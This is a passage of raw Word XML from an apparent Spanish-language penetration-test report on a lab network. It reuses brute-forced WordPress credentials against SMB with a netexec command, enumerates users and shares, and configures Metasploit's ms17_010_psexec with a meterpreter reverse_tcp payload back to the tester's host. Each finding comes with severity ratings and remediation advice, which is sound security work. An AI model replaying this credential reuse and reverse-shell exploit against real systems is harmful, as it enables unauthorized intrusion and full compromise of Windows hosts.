          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Contraseña: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QuesoManchego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65E93FF9" w14:textId="5B9A288C" w:rsidR="00391BA3" w:rsidRDefault="00964FBA" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="441268FD" wp14:editId="1DEEAC83">
            <wp:extent cx="5400040" cy="25908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F3D4" w14:textId="77777777" w:rsidR="00964FBA" w:rsidRDefault="00964FBA" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B655D06" w14:textId="77777777" w:rsidR="00964FBA" w:rsidRDefault="00964FBA" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="667A8316" w14:textId="42D26629" w:rsidR="00964FBA" w:rsidRPr="00301B4F" w:rsidRDefault="00964FBA" w:rsidP="00301B4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CA611FB" wp14:editId="63D13F4C">
            <wp:extent cx="5400040" cy="25908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1605" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Al intentar entrar por el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> se produce una redirección a localhost por lo que no se puede acceder al panel de administración desde la máquina atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2569684D" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tipo de vulnerabilidad: Acceso de administrador válido pero bloqueado por la configuración incorrecta de URL (alta).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D32B70" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recomendaciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B363CE1" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Revisar las </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>URLs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> de WordPress (WordPress </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> y Site URL) para que no apunten al localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACA71BC" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Mover o eliminar la web de prueba en localhost si no está en producción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537A05A6" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Limitar el acceso al panel de administración a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>IPs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> internas en entornos de producción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B378EAB" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:pict w14:anchorId="4FA82D95">
          <v:rect id="_x0000_i1030" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D68F608" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PIVOTAR AL SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB38EC9" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Acceso al servicio SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Con las credenciales previamente obtenidas mediante el ataque de fuerza bruta en WordPress se procedió a realizar pruebas de acceso al SMB expuesto en la máquina Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797994DA" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Validación y acceso</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t xml:space="preserve">Se utilizó la herramienta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>NetExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> para verificar la validez de las credenciales contra el servicio SMB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48505553" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.5.140 -u roldan -p "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QuesoManchego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BEB6D1" w14:textId="77777777" w:rsidR="00964FBA" w:rsidRDefault="00964FBA" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26CC6934" w14:textId="77777777" w:rsidR="00964FBA" w:rsidRDefault="00964FBA" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35EA804D" w14:textId="5D156540" w:rsidR="00964FBA" w:rsidRPr="00301B4F" w:rsidRDefault="00964FBA" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00964FBA">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18DA3653" wp14:editId="447AABFF">
            <wp:extent cx="5400040" cy="268605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3FE1" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumeración de usuarios y recursos</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Una vez validado el acceso, se realizaron tareas de enumeración:</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Usuarios del sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22627BEC" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Administrador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3738D6C4" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Guest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A93E25D" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Roldan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365FD65D" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recursos compartidos detectados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AF79B1" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>ADMIN$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DC2EDB" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>C$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FE39D6" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>IPC$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FD9C03" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clasificación de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6756EDB0" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Tipo: Acceso no autorizado mediante credenciales válidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE96789" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Severidad: ALTA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7135AA24" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Impacto: Acceso a recursos internos del sistema Windows y enumeración de información sensible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CD09D6" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RECOMENDACIONES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFF19CD" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Limitar el acceso al SMB solo a redes internas y con control de credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8DBD1E" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>No usar cuentas locales débiles (roldan, administrador) con contraseñas relacionadas con el contenido del sitio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279CF441" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:lastRenderedPageBreak/>
        <w:t>Separar claramente la web de prueba localhost de la red de producción para evitar que credenciales de prueba se usen en el entorno real.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B53189C" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:pict w14:anchorId="01E99AE7">
          <v:rect id="_x0000_i1031" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE3FEF3" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejecución Remota mediante SMB (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB887CB" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t>Tras la obtención de credenciales válidas en el sistema se identificó la posibilidad de acceso al servicio SMB del sistema Windows.</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Debido a la enumeración previa del sistema se observó que el usuario disponía de permisos suficientes para interactuar con recursos administrativos lo que motivó el uso de un módulo de ejecución remota.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483E5694" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Módulo utilizado</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>/ms17_010_psexec</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Este módulo permite la ejecución remota de comandos a través del servicio SMB utilizando credenciales válidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8C51D2" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Configuración del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Se configuraron los siguientes parámetros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142BA7E7" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Usuario: roldan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D50EC0" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Contraseña: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>QuesoManchego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DA3C0AE" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Host objetivo: 192.168.0.26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E23A062" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Puerto: 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CCD340" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47D11DA2" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>LHOST: 192.168.0.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6AB275" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>LPORT: 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644D0DD7" w14:textId="3AFBBD11" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00964FBA" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00964FBA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="669114EF" wp14:editId="4CE9A18D">
            <wp:extent cx="5400040" cy="26860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DB0D" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Justificación de la explotación</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Tras validar el acceso SMB con credenciales válidas y observar la existencia de recursos administrativos se concluyó que el usuario disponía de privilegios suficientes para la ejecución remota de código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03987BC9" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Por este motivo se utilizó el módulo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> el cual permite crear un servicio en el sistema objetivo y ejecutar un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> malicioso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E7191D" w14:textId="19BB3086" w:rsidR="00964FBA" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">La ejecución del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> permitió establecer una conexión remota con el sistema víctima mediante una sesión </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>, confirmando la ejecución remota de código en el equipo Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4D659A" w14:textId="77777777" w:rsidR="00964FBA" w:rsidRPr="00301B4F" w:rsidRDefault="00964FBA" w:rsidP="00301B4F"/>
    <w:p w14:paraId="1FD4A67F" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clasificación de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C041035" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Tipo: Ejecución remota de código mediante SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EE9255" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Severidad: CRÍTICA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15706886" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Impacto: Compromiso total del sistema (acceso remoto al equipo Windows)</w:t>
      </w:r>
    </w:p>
